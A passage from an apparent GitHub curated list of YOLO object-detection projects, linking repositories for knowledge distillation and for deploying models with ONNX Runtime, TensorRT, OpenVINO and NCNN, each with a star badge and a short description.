src="https://img.shields.io/github/stars/Sharpiless/yolov5-knowledge-distillation?style=social"/> : yolov5็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹็š„็Ÿฅ่ฏ†่’ธ้ฆ๏ผˆๅŸบไบŽๅ“ๅบ”็š„่’ธ้ฆ๏ผ‰ใ€‚ - [chengpanghu/Knowledge-Distillation-yolov5](https://github.com/chengpanghu/Knowledge-Distillation-yolov5) <img src="https://img.shields.io/github/stars/chengpanghu/Knowledge-Distillation-yolov5?style=social"/> : Knowledge-Distillation-yolov5 ๅŸบไบŽyolov5็š„็Ÿฅ่ฏ†่’ธ้ฆใ€‚ - [magicshuang/yolov5_distillation](https://github.com/magicshuang/yolov5_distillation) <img src="https://img.shields.io/github/stars/magicshuang/yolov5_distillation?style=social"/> : yolov5 ็Ÿฅ่ฏ†่’ธ้ฆ๏ผŒyolov5-lๆจกๅž‹ๅŽ‹็ผฉ่‡ณyolov5-s ๅŽ‹็ผฉ็ฎ—ๆณ•ๆ˜ฏ [Distilling Object Detectors with Fine-grained Feature Imitation](https://github.com/twangnh/Distilling-Object-Detectors)ใ€‚ - [Sharpiless/Yolov3-MobileNet-Distillation](https://github.com/Sharpiless/Yolov3-MobileNet-Distillation) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov3-MobileNet-Distillation?style=social"/> : ๅœจYolov3-MobileNetไธŠ่ฟ›่กŒๆจกๅž‹่’ธ้ฆ่ฎญ็ปƒใ€‚ - [SsisyphusTao/Object-Detection-Knowledge-Distillation](https://github.com/SsisyphusTao/Object-Detection-Knowledge-Distillation) <img src="https://img.shields.io/github/stars/SsisyphusTao/Object-Detection-Knowledge-Distillation?style=social"/> : An Object Detection Knowledge Distillation framework powered by pytorch, now having SSD and yolov5. - ### High-performance Inference Engine #### ้ซ˜ๆ€ง่ƒฝๆŽจ็†ๅผ•ๆ“Ž - ##### ONNX - [ONNX Runtime](https://github.com/microsoft/onnxruntime) <img src="https://img.shields.io/github/stars/microsoft/onnxruntime?style=social"/> : ONNX Runtime: cross-platform, high performance ML inferencing and training accelerator. [onnxruntime.ai](https://onnxruntime.ai/) - [ONNX](https://github.com/onnx/onnx) <img src="https://img.shields.io/github/stars/onnx/onnx?style=social"/> : Open Neural Network Exchange. Open standard for machine learning interoperability. [onnx.ai](https://onnx.ai/) - [ONNXMLTools](https://github.com/onnx/onnxmltools) <img src="https://img.shields.io/github/stars/onnx/onnxmltools?style=social"/> : ONNXMLTools enables you to convert models from different machine learning toolkits into [ONNX](https://github.com/onnx/onnx). [onnx.ai](https://onnx.ai/) - [xboot/libonnx](https://github.com/xboot/libonnx) <img src="https://img.shields.io/github/stars/xboot/libonnx?style=social"/> : A lightweight, portable pure C99 onnx inference engine for embedded devices with hardware acceleration support. - [kraiskil/onnx2c](https://github.com/kraiskil/onnx2c) <img src="https://img.shields.io/github/stars/kraiskil/onnx2c?style=social"/> : Open Neural Network Exchange to C compiler. Onnx2c is a [ONNX](https://onnx.ai/) to C compiler. It will read an ONNX file, and generate C code to be included in your project. Onnx2c's target is "Tiny ML", meaning running the inference on microcontrollers. - [tract](https://github.com/sonos/tract) <img src="https://img.shields.io/github/stars/sonos/tract?style=social"/> : Sonos' Neural Network inference engine. Tiny, no-nonsense, self-contained, Tensorflow and ONNX inference - [ort](https://github.com/pykeio/ort) <img src="https://img.shields.io/github/stars/pykeio/ort?style=social"/> : A Rust wrapper for ONNX Runtime. [docs.rs/ort](https://docs.rs/ort/latest/ort/) - [onnxruntime-rs](https://github.com/nbigaouette/onnxruntime-rs) <img src="https://img.shields.io/github/stars/nbigaouette/onnxruntime-rs?style=social"/> : This is an attempt at a Rust wrapper for [Microsoft's ONNX Runtime](https://github.com/microsoft/onnxruntime) (version 1.8). - [Wonnx](https://github.com/webonnx/wonnx) <img src="https://img.shields.io/github/stars/webonnx/wonnx?style=social"/> : Wonnx is a GPU-accelerated ONNX inference run-time written 100% in Rust, ready for the web. - [altius](https://github.com/maekawatoshiki/altius) <img src="https://img.shields.io/github/stars/maekawatoshiki/altius?style=social"/> : Small ONNX inference runtime written in Rust. - [Hyuto/yolo-nas-onnx](https://github.com/Hyuto/yolo-nas-onnx) <img src="https://img.shields.io/github/stars/Hyuto/yolo-nas-onnx?style=social"/> : Inference YOLO-NAS ONNX model. [hyuto.github.io/yolo-nas-onnx/](https://hyuto.github.io/yolo-nas-onnx/) - [DanielSarmiento04/yolov10cpp](https://github.com/DanielSarmiento04/yolov10cpp) <img src="https://img.shields.io/github/stars/DanielSarmiento04/yolov10cpp?style=social"/> : Implementation of yolo v10 in c++ std 17 over opencv and onnxruntime. - ##### TensorRT - [NVIDIA/TensorRT](https://github.com/NVIDIA/TensorRT) <img src="https://img.shields.io/github/stars/NVIDIA/TensorRT?style=social"/> : NVIDIAยฎ TensorRTโ„ข is an SDK for high-performance deep learning inference on NVIDIA GPUs. This repository contains the open source components of TensorRT. [developer.nvidia.com/tensorrt](https://developer.nvidia.com/tensorrt) - [NVIDIA/TensorRT-LLM](https://github.com/NVIDIA/TensorRT-LLM) <img src="https://img.shields.io/github/stars/NVIDIA/TensorRT-LLM?style=social"/> : TensorRT-LLM provides users with an easy-to-use Python API to define Large Language Models (LLMs) and build TensorRT engines that contain state-of-the-art optimizations to perform inference efficiently on NVIDIA GPUs. TensorRT-LLM also contains components to create Python and C++ runtimes that execute those TensorRT engines. [nvidia.github.io/TensorRT-LLM](https://nvidia.github.io/TensorRT-LLM) - [laugh12321/TensorRT-YOLO](https://github.com/laugh12321/TensorRT-YOLO) <img src="https://img.shields.io/github/stars/laugh12321/TensorRT-YOLO?style=social"/> : ๐Ÿš€ TensorRT-YOLO: Support YOLOv3, YOLOv5, YOLOv6, YOLOv7, YOLOv8, YOLOv9, YOLOv10, PP-YOLOE using TensorRT acceleration with EfficientNMS! TensorRT-YOLO ๆ˜ฏไธ€ไธชๆ”ฏๆŒ YOLOv3ใ€YOLOv5ใ€YOLOv6ใ€YOLOv7ใ€YOLOv8ใ€YOLOv9ใ€YOLOv10ใ€PP-YOLOE ๅ’Œ PP-YOLOE+ ็š„ๆŽจ็†ๅŠ ้€Ÿ้กน็›ฎ๏ผŒไฝฟ็”จ NVIDIA TensorRT ่ฟ›่กŒไผ˜ๅŒ–ใ€‚้กน็›ฎไธไป…้›†ๆˆไบ† EfficientNMS TensorRT ๆ’ไปถไปฅๅขžๅผบๅŽๅค„็†ๆ•ˆๆžœ๏ผŒ่ฟ˜ไฝฟ็”จไบ† CUDA ๆ ธๅ‡ฝๆ•ฐๆฅๅŠ ้€Ÿๅ‰ๅค„็†่ฟ‡็จ‹ใ€‚TensorRT-YOLO ๆไพ›ไบ† C++ ๅ’Œ Python ๆŽจ็†็š„ๆ”ฏๆŒ๏ผŒๆ—จๅœจๆไพ›ๅฟซ้€Ÿ่€Œไผ˜ๅŒ–็š„็›ฎๆ ‡ๆฃ€ๆต‹่งฃๅ†ณๆ–นๆกˆใ€‚ - [l-sf/Linfer](https://github.com/l-sf/Linfer) <img src="https://img.shields.io/github/stars/l-sf/Linfer?style=social"/> : ๅŸบไบŽTensorRT็š„C++้ซ˜ๆ€ง่ƒฝๆŽจ็†ๅบ“๏ผŒYolov10, YoloPv2๏ผŒYolov5/7/X/8๏ผŒRT-DETR๏ผŒๅ•็›ฎๆ ‡่ทŸ่ธชOSTrackใ€LightTrackใ€‚ - [Melody-Zhou/tensorRT_Pro-YOLOv8](https://github.com/Melody-Zhou/tensorRT_Pro-YOLOv8) <img src="https://img.shields.io/github/stars/Melody-Zhou/tensorRT_Pro-YOLOv8?style=social"/> : This repository is based on [shouxieai/tensorRT_Pro](https://github.com/shouxieai/tensorRT_Pro), with adjustments to support YOLOv8. ็›ฎๅ‰ๅทฒๆ”ฏๆŒ YOLOv8ใ€YOLOv8-Clsใ€YOLOv8-Segใ€YOLOv8-OBBใ€YOLOv8-Poseใ€RT-DETRใ€ByteTrackใ€YOLOv9ใ€YOLOv10ใ€RTMO ้ซ˜ๆ€ง่ƒฝๆŽจ็†๏ผ๏ผ๏ผ๐Ÿš€๐Ÿš€๐Ÿš€ - [shouxieai/tensorRT_Pro](https://github.com/shouxieai/tensorRT_Pro) <img src="https://img.shields.io/github/stars/shouxieai/tensorRT_Pro?style=social"/> : C++ library based on tensorrt integration. - [shouxieai/infer](https://github.com/shouxieai/infer) <img src="https://img.shields.io/github/stars/shouxieai/infer?style=social"/> : A new tensorrt integrate. Easy to integrate many tasks. - [kalfazed/tensorrt_starter](https://github.com/kalfazed/tensorrt_starter) <img src="https://img.shields.io/github/stars/kalfazed/tensorrt_starter?style=social"/> : This repository give a guidline to learn CUDA and TensorRT from the beginning. - [hamdiboukamcha/yolov10-tensorrt](https://github.com/hamdiboukamcha/yolov10-tensorrt) <img src="https://img.shields.io/github/stars/hamdiboukamcha/yolov10-tensorrt?style=social"/> : YOLOv10 C++ TensorRT : Real-Time End-to-End Object Detection. - [triple-Mu/YOLOv8-TensorRT](https://github.com/triple-Mu/YOLOv8-TensorRT) <img src="https://img.shields.io/github/stars/triple-Mu/YOLOv8-TensorRT?style=social"/> : YOLOv8 using TensorRT accelerate ! - [FeiYull/TensorRT-Alpha](https://github.com/FeiYull/TensorRT-Alpha) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/torch2trt?style=social"/> : ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅTensorRT for YOLOv8ใ€YOLOv8-Poseใ€YOLOv8-Segใ€YOLOv8-Clsใ€YOLOv7ใ€YOLOv6ใ€YOLOv5ใ€YOLONAS......๐Ÿš€๐Ÿš€๐Ÿš€CUDA IS ALL YOU NEED.๐ŸŽ๐ŸŽ๐ŸŽ - [cyrusbehr/YOLOv8-TensorRT-CPP](https://github.com/cyrusbehr/YOLOv8-TensorRT-CPP) <img src="https://img.shields.io/github/stars/cyrusbehr/YOLOv8-TensorRT-CPP?style=social"/> : YOLOv8 TensorRT C++ Implementation. A C++ Implementation of YoloV8 using TensorRT Supports object detection, semantic segmentation, and body pose estimation. - [VIDIA-AI-IOT/torch2trt](https://github.com/NVIDIA-AI-IOT/torch2trt) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/torch2trt?style=social"/> : An easy to use PyTorch to TensorRT converter. - [zhiqwang/yolort](https://github.com/zhiqwang/yolort) <img src="https://img.shields.io/github/stars/zhiqwang/yolort?style=social"/> : yolort is a runtime stack for yolov5 on specialized accelerators such as tensorrt, libtorch, onnxruntime, tvm and ncnn. [zhiqwang.com/yolort](https://zhiqwang.com/yolort/) - [Linaom1214/TensorRT-For-YOLO-Series](https://github.com/Linaom1214/TensorRT-For-YOLO-Series) <img src="https://img.shields.io/github/stars/Linaom1214/TensorRT-For-YOLO-Series?style=social"/> : YOLO Series TensorRT Python/C++. tensorrt for yolo series (YOLOv8, YOLOv7, YOLOv6....), nms plugin support. - [wang-xinyu/tensorrtx](https://github.com/wang-xinyu/tensorrtx) <img src="https://img.shields.io/github/stars/wang-xinyu/tensorrtx?style=social"/> : TensorRTx aims to implement popular deep learning networks with tensorrt network definition APIs. - [DefTruth/lite.ai.toolkit](https://github.com/DefTruth/lite.ai.toolkit) <img src="https://img.shields.io/github/stars/DefTruth/lite.ai.toolkit?style=social"/> : ๐Ÿ›  A lite C++ toolkit of awesome AI models with ONNXRuntime, NCNN, MNN and TNN. YOLOX, YOLOP, YOLOv6, YOLOR, MODNet, YOLOX, YOLOv7, YOLOv5. MNN, NCNN, TNN, ONNXRuntime. โ€œ๐Ÿ› Lite.Ai.ToolKit: ไธ€ไธช่ฝป้‡็บง็š„C++ AIๆจกๅž‹ๅทฅๅ…ท็ฎฑ๏ผŒ็”จๆˆทๅ‹ๅฅฝ๏ผˆ่ฟ˜่กŒๅง๏ผ‰๏ผŒๅผ€็ฎฑๅณ็”จใ€‚ๅทฒ็ปๅŒ…ๆ‹ฌ 100+ ๆต่กŒ็š„ๅผ€ๆบๆจกๅž‹ใ€‚่ฟ™ๆ˜ฏไธ€ไธชๆ นๆฎไธชไบบๅ…ด่ถฃๆ•ด็†็š„C++ๅทฅๅ…ท็ฎฑ๏ผŒ, ๆถต็›–็›ฎๆ ‡ๆฃ€ๆต‹ใ€ไบบ่„ธๆฃ€ๆต‹ใ€ไบบ่„ธ่ฏ†ๅˆซใ€่ฏญไน‰ๅˆ†ๅ‰ฒใ€ๆŠ ๅ›พ็ญ‰้ข†ๅŸŸใ€‚โ€ - [PaddlePaddle/FastDeploy](https://github.com/PaddlePaddle/FastDeploy) <img src="https://img.shields.io/github/stars/PaddlePaddle/FastDeploy?style=social"/> : โšก๏ธAn Easy-to-use and Fast Deep Learning Model Deployment Toolkit for โ˜๏ธCloud ๐Ÿ“ฑMobile and ๐Ÿ“นEdge. Including Image, Video, Text and Audio 20+ main stream scenarios and 150+ SOTA models with end-to-end optimization, multi-platform and multi-framework support. - [enazoe/yolo-tensorrt](https://github.com/enazoe/yolo-tensorrt) <img src="https://img.shields.io/github/stars/enazoe/yolo-tensorrt?style=social"/> : TensorRT8.Support Yolov5n,s,m,l,x .darknet -> tensorrt. Yolov4 Yolov3 use raw darknet *.weights and *.cfg fils. If the wrapper is useful to you,please Star it. - [guojianyang/cv-detect-robot](https://github.com/guojianyang/cv-detect-robot) <img src="https://img.shields.io/github/stars/guojianyang/cv-detect-robot?style=social"/> : ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅDocker NVIDIA Docker2 YOLOV5 YOLOX YOLO Deepsort TensorRT ROS Deepstream Jetson Nano TX2 NX for High-performance deployment(้ซ˜ๆ€ง่ƒฝ้ƒจ็ฝฒ)ใ€‚ - [BlueMirrors/Yolov5-TensorRT](https://github.com/BlueMirrors/Yolov5-TensorRT) <img src="https://img.shields.io/github/stars/BlueMirrors/Yolov5-TensorRT?style=social"/> : Yolov5 TensorRT Implementations. - [lewes6369/TensorRT-Yolov3](https://github.com/lewes6369/TensorRT-Yolov3) <img src="https://img.shields.io/github/stars/lewes6369/TensorRT-Yolov3?style=social"/> : TensorRT for Yolov3. - [CaoWGG/TensorRT-YOLOv4](https://github.com/CaoWGG/TensorRT-YOLOv4) <img src="https://img.shields.io/github/stars/CaoWGG/TensorRT-YOLOv4?style=social"/> :tensorrt5, yolov4, yolov3,yolov3-tniy,yolov3-tniy-prn. - [isarsoft/yolov4-triton-tensorrt](https://github.com/isarsoft/yolov4-triton-tensorrt) <img src="https://img.shields.io/github/stars/isarsoft/yolov4-triton-tensorrt?style=social"/> : YOLOv4 on Triton Inference Server with TensorRT. - [TrojanXu/yolov5-tensorrt](https://github.com/TrojanXu/yolov5-tensorrt) <img src="https://img.shields.io/github/stars/TrojanXu/yolov5-tensorrt?style=social"/> : A tensorrt implementation of yolov5. - [tjuskyzhang/Scaled-YOLOv4-TensorRT](https://github.com/tjuskyzhang/Scaled-YOLOv4-TensorRT) <img src="https://img.shields.io/github/stars/tjuskyzhang/Scaled-YOLOv4-TensorRT?style=social"/> : Implement yolov4-tiny-tensorrt, yolov4-csp-tensorrt, yolov4-large-tensorrt(p5, p6, p7) layer by layer using TensorRT API. - [Syencil/tensorRT](https://github.com/Syencil/tensorRT) <img src="https://img.shields.io/github/stars/Syencil/tensorRT?style=social"/> : TensorRT-7 Network Lib ๅŒ…ๆ‹ฌๅธธ็”จ็›ฎๆ ‡ๆฃ€ๆต‹ใ€ๅ…ณ้”ฎ็‚นๆฃ€ๆต‹ใ€ไบบ่„ธๆฃ€ๆต‹ใ€OCR็ญ‰ ๅฏ่ฎญ็ปƒ่‡ชๅทฑๆ•ฐๆฎใ€‚ - [SeanAvery/yolov5-tensorrt](https://github.com/SeanAvery/yolov5-tensorrt) <img src="https://img.shields.io/github/stars/SeanAvery/yolov5-tensorrt?style=social"/> : YOLOv5 in TensorRT. - [Monday-Leo/YOLOv7_Tensorrt](https://github.com/Monday-Leo/YOLOv7_Tensorrt) <img src="https://img.shields.io/github/stars/Monday-Leo/YOLOv7_Tensorrt?style=social"/> : A simple implementation of Tensorrt YOLOv7. - [ibaiGorordo/ONNX-YOLOv6-Object-Detection](https://github.com/ibaiGorordo/ONNX-YOLOv6-Object-Detection) <img src="https://img.shields.io/github/stars/ibaiGorordo/ONNX-YOLOv6-Object-Detection?style=social"/> : Python scripts performing object detection using the YOLOv6 model in ONNX. - [ibaiGorordo/ONNX-YOLOv7-Object-Detection](https://github.com/ibaiGorordo/ONNX-YOLOv7-Object-Detection) <img src="https://img.shields.io/github/stars/ibaiGorordo/ONNX-YOLOv7-Object-Detection?style=social"/> : Python scripts performing object detection using the YOLOv7 model in ONNX. - [triple-Mu/yolov7](https://github.com/triple-Mu/yolov7) <img src="https://img.shields.io/github/stars/triple-Mu/yolov7?style=social"/> : End2end TensorRT YOLOv7. - [hewen0901/yolov7_trt](https://github.com/hewen0901/yolov7_trt) <img src="https://img.shields.io/github/stars/hewen0901/yolov7_trt?style=social"/> : yolov7็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•็š„c++ tensorrt้ƒจ็ฝฒไปฃ็ ใ€‚ - [tsutof/tiny_yolov2_onnx_cam](https://github.com/tsutof/tiny_yolov2_onnx_cam) <img src="https://img.shields.io/github/stars/tsutof/tiny_yolov2_onnx_cam?style=social"/> : Tiny YOLO v2 Inference Application with NVIDIA TensorRT. - [Monday-Leo/Yolov5_Tensorrt_Win10](https://github.com/Monday-Leo/Yolov5_Tensorrt_Win10) <img src="https://img.shields.io/github/stars/Monday-Leo/Yolov5_Tensorrt_Win10?style=social"/> : A simple implementation of tensorrt yolov5 python/c++๐Ÿ”ฅ - [Wulingtian/yolov5_tensorrt_int8](https://github.com/Wulingtian/yolov5_tensorrt_int8) <img src="https://img.shields.io/github/stars/Wulingtian/yolov5_tensorrt_int8?style=social"/> : TensorRT int8 ้‡ๅŒ–้ƒจ็ฝฒ yolov5s ๆจกๅž‹๏ผŒๅฎžๆต‹3.3msไธ€ๅธง๏ผ - [Wulingtian/yolov5_tensorrt_int8_tools](https://github.com/Wulingtian/yolov5_tensorrt_int8_tools) <img src="https://img.shields.io/github/stars/Wulingtian/yolov5_tensorrt_int8_tools?style=social"/> : tensorrt int8 ้‡ๅŒ–yolov5 onnxๆจกๅž‹ใ€‚ - [MadaoFY/yolov5_TensorRT_inference](https://github.com/MadaoFY/yolov5_TensorRT_inference) <img src="https://img.shields.io/github/stars/MadaoFY/yolov5_TensorRT_inference?style=social"/> : ่ฎฐๅฝ•yolov5็š„TensorRT้‡ๅŒ–ๅŠๆŽจ็†ไปฃ็ ๏ผŒ็ปๅฎžๆต‹ๅฏ่ฟ่กŒไบŽJetsonๅนณๅฐใ€‚ - [ibaiGorordo/ONNX-YOLOv8-Object-Detection](https://github.com/ibaiGorordo/ONNX-YOLOv8-Object-Detection) <img src="https://img.shields.io/github/stars/ibaiGorordo/ONNX-YOLOv8-Object-Detection?style=social"/> : Python scripts performing object detection using the YOLOv8 model in ONNX. - [we0091234/yolov8-tensorrt](https://github.com/we0091234/yolov8-tensorrt) <img src="https://img.shields.io/github/stars/we0091234/yolov8-tensorrt?style=social"/> : yolov8 tensorrt ๅŠ ้€Ÿ. - [FeiYull/yolov8-tensorrt](https://github.com/FeiYull/yolov8-tensorrt) <img src="https://img.shields.io/github/stars/FeiYull/yolov8-tensorrt?style=social"/> : YOLOv8็š„TensorRT+CUDAๅŠ ้€Ÿ้ƒจ็ฝฒ๏ผŒไปฃ็ ๅฏๅœจWinใ€Linuxไธ‹่ฟ่กŒใ€‚ - [cvdong/YOLO_TRT_SIM](https://github.com/cvdong/YOLO_TRT_SIM) <img src="https://img.shields.io/github/stars/cvdong/YOLO_TRT_SIM?style=social"/> : ๐Ÿ‡ ไธ€ๅฅ—ไปฃ็ ๅŒๆ—ถๆ”ฏๆŒYOLO X, V5, V6, V7, V8 TRTๆŽจ็† โ„ข๏ธ ๐Ÿ” ,ๅ‰ๅŽๅค„็†ๅ‡็”ฑCUDAๆ ธๅ‡ฝๆ•ฐๅฎž็Žฐ CPP/CUDA๐Ÿš€ - [cvdong/YOLO_TRT_PY](https://github.com/cvdong/YOLO_TRT_PY) <img src="https://img.shields.io/github/stars/cvdong/YOLO_TRT_PY?style=social"/> : ๐Ÿฐ ไธ€ๅฅ—ไปฃ็ ๅŒๆ—ถๆ”ฏๆŒYOLOV5, V6, V7, V8 TRTๆŽจ็† โ„ข๏ธ PYTHON โœˆ๏ธ - [Psynosaur/Jetson-SecVision](https://github.com/Psynosaur/Jetson-SecVision) <img src="https://img.shields.io/github/stars/Psynosaur/Jetson-SecVision?style=social"/> : Person detection for Hikvision DVR with AlarmIO ports, uses TensorRT and yolov4. - [tatsuya-fukuoka/yolov7-onnx-infer](https://github.com/tatsuya-fukuoka/yolov7-onnx-infer) <img src="https://img.shields.io/github/stars/tatsuya-fukuoka/yolov7-onnx-infer?style=social"/> : Inference with yolov7's onnx model. - [MadaoFY/yolov5_TensorRT_inference](https://github.com/MadaoFY/yolov5_TensorRT_inference) <img src="https://img.shields.io/github/stars/MadaoFY/yolov5_TensorRT_inference?style=social"/> : ่ฎฐๅฝ•yolov5็š„TensorRT้‡ๅŒ–ๅŠๆŽจ็†ไปฃ็ ๏ผŒ็ปๅฎžๆต‹ๅฏ่ฟ่กŒไบŽJetsonๅนณๅฐใ€‚ - [ervgan/yolov5_tensorrt_inference](https://github.com/ervgan/yolov5_tensorrt_inference) <img src="https://img.shields.io/github/stars/ervgan/yolov5_tensorrt_inference?style=social"/> : TensorRT cpp inference for Yolov5 model. Supports yolov5 v1.0, v2.0, v3.0, v3.1, v4.0, v5.0, v6.0, v6.2, v7.0. - [AlbinZhu/easy-trt](https://github.com/AlbinZhu/easy-trt) <img src="https://img.shields.io/github/stars/AlbinZhu/easy-trt?style=social"/> : TensorRT for YOLOv10 with CUDA. - ##### OpenVINO - [OpenVINO](https://github.com/openvinotoolkit/openvino) <img src="https://img.shields.io/github/stars/openvinotoolkit/openvino?style=social"/> : This open source version includes several components: namely Model Optimizer, OpenVINOโ„ข Runtime, Post-Training Optimization Tool, as well as CPU, GPU, MYRIAD, multi device and heterogeneous plugins to accelerate deep learning inferencing on Intelยฎ CPUs and Intelยฎ Processor Graphics. - [PINTO0309/OpenVINO-YoloV3](https://github.com/PINTO0309/OpenVINO-YoloV3) <img src="https://img.shields.io/github/stars/PINTO0309/OpenVINO-YoloV3?style=social"/> : YoloV3/tiny-YoloV3 + RaspberryPi3/Ubuntu LaptopPC + NCS/NCS2 + USB Camera + Python + OpenVINO. - [TNTWEN/OpenVINO-YOLOV4](https://github.com/TNTWEN/OpenVINO-YOLOV4) <img src="https://img.shields.io/github/stars/TNTWEN/OpenVINO-YOLOV4?style=social"/> : This is implementation of YOLOv4,YOLOv4-relu,YOLOv4-tiny,YOLOv4-tiny-3l,Scaled-YOLOv4 and INT8 Quantization in OpenVINO2021.3. - [fb029ed/yolov5_cpp_openvino](https://github.com/fb029ed/yolov5_cpp_openvino) <img src="https://img.shields.io/github/stars/fb029ed/yolov5_cpp_openvino?style=social"/> : ็”จc++ๅฎž็Žฐไบ†yolov5ไฝฟ็”จopenvino็š„้ƒจ็ฝฒใ€‚ - [dlod-openvino/yolov5_infer](https://github.com/dlod-openvino/yolov5_infer) <img src="https://img.shields.io/github/stars/dlod-openvino/yolov5_infer?style=social"/> : Do the YOLOv5 model inference by OpenCV/OpenVINO based on onnx model format. - [snail0614/yolov5.6_openvino_cpp](https://github.com/snail0614/yolov5.6_openvino_cpp) <img src="https://img.shields.io/github/stars/snail0614/yolov5.6_openvino_cpp?style=social"/> : yolov5.6.1 OpenVINO็š„C++ๅฎž็Žฐใ€‚ - [shungfu/openvino_yolov5v7](https://github.com/shungfu/openvino_yolov5v7) <img src="https://img.shields.io/github/stars/shungfu/openvino_yolov5v7?style=social"/> : YOLOv5 YOLOv7 INT8 quantization using OpenVINO. - [dacquaviva/yolov5-openvino-cpp-python](https://github.com/dacquaviva/yolov5-openvino-cpp-python) <img src="https://img.shields.io/github/stars/dacquaviva/yolov5-openvino-cpp-python?style=social"/> : Example of using ultralytics YOLOv5 with Openvino in C++ and Python. - [rlggyp/YOLOv10-OpenVINO-CPP-Inference](https://github.com/rlggyp/YOLOv10-OpenVINO-CPP-Inference) <img src="https://img.shields.io/github/stars/rlggyp/YOLOv10-OpenVINO-CPP-Inference?style=social"/> : YOLOv10 C++ implementation using OpenVINO for efficient and accurate real-time object detection. - ##### NCNN - [NCNN](https://github.com/Tencent/ncnn) <img src="https://img.shields.io/github/stars/Tencent/ncnn?style=social"/> : ncnn is a high-performance neural network inference framework optimized for the mobile platform. - [Baiyuetribe/ncnn-models](https://github.com/Baiyuetribe/ncnn-models) <img src="https://img.shields.io/github/stars/Baiyuetribe/ncnn-models?style=social"/> : awesome AI models with NCNN, and how they were converted โœจโœจโœจ - [cmdbug/YOLOv5_NCNN](https://github.com/cmdbug/YOLOv5_NCNN) <img src="https://img.shields.io/github/stars/cmdbug/YOLOv5_NCNN?style=social"/> : ๐Ÿ… Deploy ncnn on mobile phones. Support Android and iOS. ็งปๅŠจ็ซฏncnn้ƒจ็ฝฒ๏ผŒๆ”ฏๆŒAndroidไธŽiOSใ€‚ - [natanielruiz/android-yolo](https://github.com/natanielruiz/android-yolo) <img src="https://img.shields.io/github/stars/natanielruiz/android-yolo?style=social"/> : Real-time object detection on Android using the YOLO network with TensorFlow. - [nihui/ncnn-android-yolov5](https://github.com/nihui/ncnn-android-yolov5) <img src="https://img.shields.io/github/stars/nihui/ncnn-android-yolov5?style=social"/> : The YOLOv5 object detection android example. - [szaza/android-yolo-v2](https://github.com/szaza/android-yolo-v2) <img src="https://img.shields.io/github/stars/szaza/android-yolo-v2?style=social"/> : Android YOLO real time object detection sample application with Tensorflow mobile. - [FeiGeChuanShu/ncnn-android-yolox](https://github.com/FeiGeChuanShu/ncnn-android-yolox) <img src="https://img.shields.io/github/stars/FeiGeChuanShu/ncnn-android-yolox?style=social"/> : Real time yolox Android demo by ncnn. - [xiangweizeng/darknet2ncnn](https://github.com/xiangweizeng/darknet2ncnn) <img src="https://img.shields.io/github/stars/xiangweizeng/darknet2ncnn?style=social"/> : Darknet2ncnn converts the darknet model to the ncnn model. - [sunnyden/YOLOV5_NCNN_Android](https://github.com/sunnyden/YOLOV5_NCNN_Android) <img src="https://img.shields.io/github/stars/sunnyden/YOLOV5_NCNN_Android?style=social"/> : YOLOv5 C++ Implementation on Android using NCNN framework. - [duangenquan/YoloV2NCS](https://github.com/duangenquan/YoloV2NCS) <img src="https://img.shields.io/github/stars/duangenquan/YoloV2NCS?style=social"/> : This project shows how to run tiny yolo v2 with movidius stick. - [lp6m/yolov5s_android](https://github.com/lp6m/yolov5s_android) <img src="https://img.shields.io/github/stars/lp6m/yolov5s_android?style=social"/> : Run yolov5s on Android device! - [KoheiKanagu/ncnn_yolox_flutter](https://github.com/KoheiKanagu/ncnn_yolox_flutter) <img src="https://img.shields.io/github/stars/KoheiKanagu/ncnn_yolox_flutter?style=social"/> : This is a plugin to run YOLOX on ncnn. - [cyrillkuettel/ncnn-android-yolov5](https://github.com/cyrillkuettel/ncnn-android-yolov5) <img src="https://img.shields.io/github/stars/cyrillkuettel/ncnn-android-yolov5?style=social"/> : This is a sample ncnn android project, it depends on ncnn library and opencv. - [DataXujing/ncnn_android_yolov6](https://github.com/DataXujing/ncnn_android_yolov6) <img src="https://img.shields.io/github/stars/DataXujing/ncnn_android_yolov6?style=social"/> : ๆ‰‹ๆ‘ธๆ‰‹ๅฎž็ŽฐๅŸบไบŽQTๅ’ŒNCNN็š„ๅฎ‰ๅ“ๆ‰‹ๆœบYOLOv6ๆจกๅž‹็š„้ƒจ็ฝฒ๏ผ - [Qengineering/YoloV3-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV3-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV3-ncnn-Raspberry-Pi-4?style=social"/> : YoloV3 Raspberry Pi 4. - [Qengineering/YoloV4-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV4-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV4-ncnn-Raspberry-Pi-4?style=social"/> : YoloV4 on a bare Raspberry Pi 4 with ncnn framework. - [Qengineering/YoloV5-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV5-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV5-ncnn-Raspberry-Pi-4?style=social"/> : YoloV5 for a bare Raspberry Pi 4. - [Qengineering/YoloV6-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV6-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV6-ncnn-Raspberry-Pi-4?style=social"/> : YoloV6 for a bare Raspberry Pi using ncnn. - [Qengineering/YoloV7-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV7-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV7-ncnn-Raspberry-Pi-4?style=social"/> : YoloV7 for a bare Raspberry Pi using ncnn. - [Qengineering/YoloV8-ncnn-Raspberry-Pi-4](https://github.com/Qengineering/YoloV8-ncnn-Raspberry-Pi-4) <img src="https://img.shields.io/github/stars/Qengineering/YoloV8-ncnn-Raspberry-Pi-4?style=social"/> : YoloV8 for a bare Raspberry Pi 4. - [FeiGeChuanShu/ncnn-android-yolov8](https://github.com/FeiGeChuanShu/ncnn-android-yolov8) <img src="https://img.shields.io/github/stars/FeiGeChuanShu/ncnn-android-yolov8?style=social"/> : Real time yolov8 Android demo by ncnn. - 